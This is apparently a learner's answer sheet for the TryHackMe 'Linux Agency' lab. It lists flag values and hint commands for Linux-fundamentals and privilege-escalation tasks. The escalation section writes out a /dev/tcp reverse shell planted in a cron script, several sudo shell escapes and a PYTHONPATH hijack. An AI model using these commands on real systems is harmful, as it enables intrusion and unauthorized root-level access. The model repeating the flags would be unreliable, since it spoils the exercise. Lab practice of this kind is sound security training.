#Task 3 - Linux Fundamentals 
- What is the mission1 flag?
mission1{174dc8f191bcbb161fe25f8a5b58d1f0}

- What is the mission2 flag?
mission2{8a1b68bb11e4a35245061656b5b9fa0d}

- What is the mission3 flag?
mission3{ab1e1ae5cba688340825103f70b0f976}

- What is the mission4 flag?
mission4{264a7eeb920f80b3ee9665fafb7ff92d}

- What is the mission5 flag?
mission5{bc67906710c3a376bcc7bd25978f62c0}

- What is the mission6 flag?
mission6{1fa67e1adc244b5c6ea711f0c9675fde}

- What is the mission7 flag?
mission7{53fd6b2bad6e85519c7403267225def5}

- What is the mission8 flag?
mission8{3bee25ebda7fe7dc0a9d2f481d10577b}

- What is the mission9 flag?
hint: find / -type f -user mission8 -name "*flag*" 2>/dev/null
mission9{ba1069363d182e1c114bef7521c898f5}

- What is the mission10 flag?
hint: grep -i "mission10" rockyou.txt
mission10{0c9d1c7c5683a1a29b05bb67856524b6}

- What is the mission11 flag?
hint: find . -type f -exec cat {} \; | grep "mission11"
mission11{db074d9b68f06246944b991d433180c0}

- What is the mission12 flag?
hint: cat /home/mission11/.bashrc | grep "flag"
echo $flag
mission12{f449a1d33d6edc327354635967f9a720}

- What is the mission13 flag?
hint: ls -la
chmod a+r flag.txt
mission13{076124e360406b4c98ecefddd13ddb1f}

- What is the mission14 flag?
hint: ls -la
chmod a+x+w
cat flag.txt | base64 -d
mission14{d598de95639514b9941507617b9e54d2}

- What is the mission15 flag?
hint: Flag.txt is in binary, and convert it into ascii using ASCII,Hex,Binary,Decimal,Base64 converter 
https://www.rapidtables.com/convert/number/ascii-hex-bin-dec-converter.html
cat flag.txt 
mission15{fc4915d818bfaeff01185c3547f25596}

- What is the mission16 flag?
hint: cat flag.txt
cat flag.txt | xxd -r -p
or: Enter hex file https://www.rapidtables.com/convert/number/ascii-hex-bin-dec-converter.html
mission16{884417d40033c4c2091b44d7c26a908e}

- What is the mission17 flag?
hint: ls -la
file flag
---> file sh
chmod +x flag 
./flag
mission17{49f8d1348a1053e221dfe7ff99f5cbf4}


- What is the mission18 flag?
hint: javac flag.java
java flag 
mission18{f09760649986b489cda320ab5f7917e8}


- What is the mission19 flag?
hint: ruby flag.rb 
mission19{a0bf41f56b3ac622d808f7a4385254b7}


- What is the mission20 flag?
hint: gcc flag.c -o flag
mission20{b0482f9e90c8ad2421bf4353cd8eae1c}


- What is the mission21 flag?
hint: python flag.py 
mission21{7de756aabc528b446f6eb38419318f0c}


- What is the mission22 flag?
cat .bashrc
echo "fWZhYTk0ZDI0YjQ4OTZlMmE2ZGU5ODgwYmU0N2FhYzQyezIybm9pc3NpbQo="|base64 -d|rev
or: bash -i
mission22{24caa74eb0889ed6a2e6984b42d49aaf}


- What is the mission23 flag?
hint: import pty; pty.spawn("/bin/bash")
ls -la
mission23{3710b9cb185282e3f61d2fd8b1b4ffea}


- What is the mission24 flag?
hint: cat messenge.txt
cat /etc/hosts
curl linuxagency | grep "mission"
or curl http://mission24.com | grep "mission"
mission24{dbaeb06591a7fd6230407df3a947b89c}



- What is the mission25 flag?
hint:./bribe
cat .viminfo
export pocket=money
./bribe
mission25{61b93637881c87c71f220033b22a921b}


- What is the mission26 flag?
hint: ls
echo $PATH
/bin/ls ../mission26
/bin/cat ../mission26/flag.txt
mission26{cb6ce977c16c57f509e9f8462a120f00}

- What is the mission27 flag?
hint: file flag.jpg
strings flag.gpg | grep mission
mission27{444d29b932124a48e7dddc0595788f4d}

- What is the mission28 flag?
hint: gzip -d flag.mp3.mp4.exe.elf.tar.php.ipynb.py.rb.html.css.zip.gz.jpg.png.gz
or gunzip flag.mp3.mp4.exe.elf.tar.php.ipynb.py.rb.html.css.zip.gz.jpg.png.gz
string flag.mp3.mp4.exe.elf.tar.php.ipynb.py.rb.html.css.zip.gz.jpg.png | grep mission
mission28{03556f8ca983ef4dc26d2055aef9770f}


- What is the mission29 flag?
hint: exec "/bin/bash"
cat cat txt.galf | rev
mission29{8192b05d8b12632586e25be74da2fff1}


- What is the mission30 flag?
hint: grep -iRl mission30{ 2> /dev/null
cat .htpasswd | grep mission
mission30{d25b4c9fac38411d2fcb4796171bda6e}


- What is viktor's Flag?
hint: cd ../mission30
cd Escalator
ls -alh
git log
viktor{b52c60124c0f8f85fe647021122b3d9a}


#Task 4 - Privilege Escalation 
- What is dalia's flag?
dalia{4a94a7a7bb4a819a63a33979926c77dc}
hint: find / -type f,d -user viktor 2>/dev/null
cat /etc/crontab 
$ip=ip lhost
run nc -lvnp 4444
echo "bash -c 'exec bash -i &>/dev/tcp/$ip/4444 <&1'" > /opt/scripts/47.sh
ls
sudo -l
cat flag.txt
dalia{4a94a7a7bb4a819a63a33979926c77dc}


- What is silvio's flag?
hint: TF=$(mktemp -u)
sudo -u silvio zip $TF /etc/hosts -T -TT 'sh #'
whoami
id
python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
cat flag.txt
sudo -l
silvio{657b4d058c03ab9988875bc937f9c2ef}

- What is reza's flag?
hint: sudo -l
id
https://gtfobins.github.io/gtfobins/git/#sudo
sudo -u reza PAGER='sh -c "exec sh 0<&1"' git -p help
reza{2f1901644eda75306f3142d837b80d3e}


- What is jordan's flag?
sudo -u jordan /opt/scripts/Gun-Shop.py
sudo -ll
mkdir -p /tmp/shop; echo 'import os; os.system("/bin/bash");' > /tmp/shop/shop.py
sudo -u jordan PYTHONPATH=/tmp/shop/ /opt/scripts/Gun-Shop.py
cat /home/jordan/flag.txt | rev
jordan{fcbc4b3c31c9b58289b3946978f9e3c3}



- What is ken's flag?
hint: https://gtfobins.github.io/gtfobins/less/#sudo
sudo -u ken less /etc/profile
!/bin/sh
ken{4115bf456d1aaf012ed4550c418ba99f}


- What is sean's flag?
sudo -u sean vim -c ':!/bin/sh'
ls -als /home/sean
grep -iRl 'sean{' /var/log 2>/dev/null
sean is in the adm group so he can read /var/log
grep -r 'sean{' /var/log 2>/dev/null
sean{4c5685f4db7966a43cf8e95859801281}











http://wuvel.net/tryhackme/linux-agency/
https://hamdisevben.medium.com/tryhackme-linux-agency-writeup-walkthrough-more-than-linux-f218dcc5ed2b
https://marcorei7.wordpress.com/2021/03/09/114-linux-agency/
https://blog.raw.pm/en/TryHackMe-Linux-Agency-write-up/
https://writeup.raw.pm/
https://anugrahsr.github.io/posts/THM-Daily-Bugle/

